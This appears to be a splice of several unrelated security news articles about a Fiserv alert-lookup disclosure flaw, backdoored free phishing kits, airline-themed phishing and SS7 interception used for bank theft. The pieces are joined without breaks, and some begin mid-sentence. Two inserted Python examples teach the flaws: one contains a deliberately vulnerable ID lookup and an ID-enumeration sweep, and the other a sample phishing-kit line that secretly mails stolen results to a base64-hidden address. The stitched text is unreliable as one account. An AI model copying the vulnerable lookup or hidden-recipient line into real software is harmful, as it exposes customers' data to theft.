affected customers banking with hundreds of financial institutions

US-based financial services firm Fiserv has just fixed a flaw in its web platform that exposed the personal and financial details of a vast number of banking customers. With more than 12,000 clients across the world using the company's services, it is hard to establish how many customers' details were exposed in the 'information disclosure vulnerability' found by security researcher Kristian Erik Hermansen. When logging into his local bank, which uses Fiserv's platform, Hermansen learned that email alerts for financial transactions were assigned an 'event number', which he successfully predicted were distributed in sequence, according to KrebsOnSecurity. Using this knowledge, the researcher was able to directly view alerts set up by another customer by rewriting the site's code in his browser and sending a request for an altered event number. He was able to view the customer's email address, phone number and bank account number, as well as view and edit alerts they had previously set up. "I shouldn't be able to see this data," he said. "Anytime you spend money that should be a private transaction between you and your bank, not available for everyone else to see." He added that a criminal could have exploited the flaw to steal information from customers. Together with KrebsOnSecurity author Brian Krebs, Hermansen worked to verify whether or not the flaw was exclusive to his own bank's installation of the platform. They soon discovered that hundreds of other Fiserv-affiliated banks may have been just as vulnerable as those they had tested.
IT Pro approached Fiserv for comment, and to establish how many institutions in the UK may have been affected, if any, but the company did not respond at the time of writing. A spokesperson told Krebs that Fiserv had responded accordingly and corrected the issue. "After receiving your email, we promptly engaged appropriate resources and worked around the clock to research and remediate the situation," the spokesperson said. "We developed a security patch within 24 hours of receiving notification and deployed the patch to clients that utilise a hosted version of the solution. We will be deploying the patch this evening to clients that utilise an in-house version of the solution." While information disclosure vulnerabilities are among the most common types of website security issues, according to Krebs, they are also the most preventable and easy to fix. But they can also cause just as much damage to a company's brand as more severe security risks.
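The flaw described above is a missing server-side ownership check on a sequentially numbered record: the platform looked the alert up by event number and never asked whether it belonged to the logged-in customer. The following is an added example, not Fiserv's code, showing that lookup beside a hardened version that enforces ownership, plus an audit helper that counts how many neighbouring event numbers one user can read. All customer data, names and event numbers are constructed.

```python
"""Authorization failure behind an alert-lookup IDOR, and the fix.
Added example; the store, customers and event numbers are constructed."""
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Alert:
    event_number: int   # sequential id, as in the reported platform
    owner: str          # customer the alert belongs to
    email: str
    phone: str
    account: str


# Constructed sample data: two customers whose alerts were issued in sequence.
ALERTS: Dict[int, Alert] = {
    1001: Alert(1001, "alice", "alice@example.test", "555-0101", "ACCT-0001"),
    1002: Alert(1002, "bob", "bob@example.test", "555-0102", "ACCT-0002"),
}


class Forbidden(Exception):
    """Raised when a caller asks for a record they do not own."""


def get_alert_vulnerable(session_user: str, event_number: int) -> Optional[Alert]:
    """Looks up the alert by id only. The session user is ignored, so any
    authenticated customer who alters the event number in the request
    receives another customer's record."""
    return ALERTS.get(event_number)


def get_alert_hardened(session_user: str, event_number: int) -> Alert:
    """Looks up by id, then checks ownership against the server-side session.
    Missing and foreign records get the same answer so the response does not
    reveal which event numbers exist."""
    alert = ALERTS.get(event_number)
    if alert is None or alert.owner != session_user:
        raise Forbidden("no such alert for this user")
    return alert


def new_event_reference() -> str:
    """Defence in depth: an unguessable reference makes enumeration
    impractical, but it does not replace the ownership check above."""
    return secrets.token_urlsafe(16)


def enumerate_readable(session_user: str, lookup: Callable, start: int, count: int) -> List[int]:
    """Audit helper: which ids in a sequential range can one user read through
    the given lookup? With the fix applied, only that user's own ids remain."""
    readable = []
    for n in range(start, start + count):
        try:
            if lookup(session_user, n) is not None:
                readable.append(n)
        except Forbidden:
            pass
    return readable


if __name__ == "__main__":
    print("vulnerable:", enumerate_readable("alice", get_alert_vulnerable, 1000, 5))
    print("hardened:  ", enumerate_readable("alice", get_alert_hardened, 1000, 5))
```

The audit helper doubles as a regression test: a sweep over a range of event numbers with a single customer's session should return only that customer's records once the ownership check is in place.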
It seems the old warning 'you get what you pay for' can just as easily be applied to items purchased on underground forums and the dark web as it can to anything you buy elsewhere, because unbeknown to those experimenting with free phishing kits, they're secretly being phished themselves. An analysis of over one thousand phishing kits designed to allow wannabe cybercriminals to build phishing emails and websites found that, in a significant proportion of cases, the trainee phishers are being compromised, with their stolen data being secretly sent to the kit authors. With phishing simple to carry out but potentially very financially rewarding -- some of the highest-profile cyber-attacks of recent years began with a phishing email -- it's no wonder that newbie hackers want in. But their lack of skill is coming back to bite some of these aspiring cybercriminals, who might find that all their ill-gotten gains are also transferred to the original author of the kit. Researchers at Imperva analysed 1,019 readily available phishing kits, finding underground markets filled with low-cost and free phishing kits advertised as a means of providing aspiring cyber-attackers with a route into the illegal industry. "Underground markets are full of phishing kits at all levels and cost, some even distributed at no charge, usually revealing one of the oldest rules in the book -- you get what you pay for," said Luda Lazar, security research engineer at Imperva. "Here we found the only free cheese is in the mousetrap," she added. While these phishing kits did provide aspiring attackers with the files necessary to create a copy of target websites and steal valuable information, many of these free offerings contain an undisclosed backdoor.
That means the kit author is able to secretly track the campaigns of the crooks using the software and gain access to the stolen information themselves. In doing so, they're able to exploit the likes of stolen usernames, passwords, and credit card details without putting in the effort required to collect them. As a result, the phishing kit user can't reap much from their criminal gains, as in many cases victims will change passwords or cancel credit cards if they realise they've been targeted. "About 25 percent of the kits contained implicit recipients which receive emails with the phishing results as well as the kit buyers who were intended to receive it. We assume that the hidden addresses belong to the kits' authors, which are actually stealing from the inexperienced phishers who deploy these kits," said Lazar. Ultimately, by offering these phishing kits for free, it provides those behind them with the largest possible pool of victims to exploit -- and it's not as if a hacker can complain to the authorities that they've been scammed.
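The "implicit recipients" Imperva describes are addresses that a kit mails results to in addition to the one its operator configured. When an analyst triages a captured kit, the basic check is to compare the recipients visible in the source with any that only appear after decoding string literals. The following is an added example, not Imperva's tooling, that runs that comparison over a constructed PHP-style fragment; the addresses, variable names and the base64-hidden recipient are all constructed for illustration.

```python
"""Triage check for undeclared result recipients in a captured phishing kit.
Added example; the kit fragment and every address in it are constructed."""
import base64
import binascii
import re
from typing import Dict, List

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# String literals long enough to hold an encoded address.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")

# Constructed sample: the operator configured one recipient, but the send
# routine appends a second address that is only present in encoded form.
SAMPLE_KIT_SOURCE = r'''
<?php
$recipient = "buyer@example.test";          // address the kit buyer configured
$subject   = "Result";
$send_to   = $recipient . "," . base64_decode("YXV0aG9yQGV4YW1wbGUudGVzdA==");
mail($send_to, $subject, $message);
?>
'''


def decode_literals(source: str) -> List[str]:
    """Return the UTF-8 text of every base64-looking string literal that
    decodes cleanly; anything that is not valid base64 is skipped."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
    return decoded


def find_recipients(source: str) -> Dict[str, List[str]]:
    """Split addresses into those visible in plain text ('declared') and those
    that only surface after decoding literals ('hidden')."""
    declared = set(EMAIL_RE.findall(source))
    hidden = set()
    for text in decode_literals(source):
        hidden.update(EMAIL_RE.findall(text))
    return {"declared": sorted(declared), "hidden": sorted(hidden - declared)}


def has_undeclared_recipient(source: str) -> bool:
    """True when the kit would mail results somewhere its operator never set."""
    return bool(find_recipients(source)["hidden"])


if __name__ == "__main__":
    print(find_recipients(SAMPLE_KIT_SOURCE))
```

Real kits vary in how they hide the second address, so this check is a first pass rather than a complete detector; its value is in making the declared-versus-decoded comparison explicit.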
malware -- and they're even mimicking internal corporate travel and expenses systems to steal personal details from the victims they target. While cybercriminals using the lure of fake travel itineraries to dupe staff working in sectors reliant on shipping goods or employee travel isn't new, researchers have uncovered a particularly advanced phishing attack. Discovered by cybersecurity researchers at Barracuda Networks, this airline phishing attack uses a variety of techniques to capture sensitive data from victims and deploy an advanced persistent threat. The email from the attacker impersonates a travel agency or an employee in the target's own HR or finance department. The email's subject line claims it's a forwarded message about a flight confirmation, stating the airline, the destination, and the price of the flight. All three of these elements are carefully researched by the attackers, who select them specifically according to the target, in order to make the email look legitimate in the context of the company and the email recipient. Taking the time to tailor phishing emails in this way works: these messages are opened 90 percent of the time, one of the highest success rates for phishing attacks, according to Barracuda. Once opened, the email presents the target with an attachment in the form of a PDF or Microsoft Word document. The attachment purports to be a flight confirmation or receipt but, of course, it's neither of these things. When the target opens the attachment, the malware runs immediately, dropping an advanced persistent threat into the network and enabling the attacker to stealthily monitor the infected organisation -- likely with the aim of conducting espionage and stealing data.
Another variant of this attack, instead of dropping malware to stealthily steal data, uses phishing links to directly take sensitive information from the victim. These phishing links are ultimately designed to trick the victim into supplying sensitive corporate credentials, which the attackers will then use to infiltrate the company network, databases, and emails in order to steal information. Cybersecurity researchers warn that the combined use of impersonation, malware, and phishing is particularly dangerous because these methods complement one another, enabling the attacker to essentially gain control of the network. At this stage, the attackers can stealthily conduct espionage or even drop additional malware and ransomware. Sometimes it can be very difficult to identify a phishing email, but the likes of sandboxing and advanced persistent threat prevention, combined with employee training and awareness, can increase the chances of preventing attacks from compromising the network.
For years, researchers, hackers, and even some politicians have warned about stark vulnerabilities in a mobile data network called SS7. These flaws allow attackers to listen to calls, intercept text messages, and pinpoint a device's location, armed with just the target's phone number. Taking advantage of these issues has typically been reserved for governments or surveillance contractors. But on Wednesday, German newspaper the Süddeutsche Zeitung reported that financially motivated hackers had used those flaws to help drain bank accounts. This is much bigger than a series of bank accounts, though: it cements the fact that the SS7 network poses a threat to all of us, the general public. And it shows that companies and services across the world urgently need to move away from SMS-based authentication to protect customer accounts. "I'm not surprised that hackers take money that is 'lying on the table'. I'm just surprised that online bank thieves took so long in joining spying contractors in abusing the global SS7 network," Karsten Nohl, a cybersecurity researcher who has highlighted vulnerabilities in SS7, told Motherboard in an email. In short, the issue with SS7 is that the network believes whatever you tell it. SS7 is especially used for data roaming: when a phone user goes outside their own provider's coverage, messages still need to get routed to them. But anyone with SS7 access, which can be purchased for around 1,000 euros according to the Süddeutsche Zeitung, can send a routing request, and the network may not authenticate where the message is coming from.
That allows the attacker to direct a target's text messages to another device and, in the case of the bank accounts, steal any codes needed to log in or greenlight money transfers (after the hackers obtained victim passwords). Although some telcos have taken steps to mitigate the issue, there are clearly still huge gaps for hackers to exploit. "Everyone's accounts protected by text-based two-factor authentication, such as bank accounts, are potentially at risk until the FCC and telecom industry fix the devastating SS7 security flaw," Lieu said in a statement published Wednesday. "I urge the Republican-controlled Congress to hold immediate hearings on this issue." In the meantime, and maybe irrespective of whether SS7 problems are ever fixed, social media companies, banks, and other online services need to stop using SMS-based two-factor authentication. Last year the National Institute of Standards and Technology said it was no longer recommending solutions that used SMS. Twitter does let users sign in with a code from Google Authenticator, an app on your smartphone that provides a more robust form of two-factor authentication, but the site apparently still sends those logging in an SMS code, which, in light of these recent SS7 attacks, totally undermines the extra security protections. Twitter did not immediately respond to a request for comment. Motherboard even recently published a piece telling general readers that they were likely fine with only SMS-based two-factor authentication, which focused on another type of attack and was based on the premise that non-state hackers were not widely using SS7. That piece, clearly, is out of date.
"It is unacceptable the FCC and telecom industry have not acted sooner to protect our privacy and financial security," Lieu's statement added.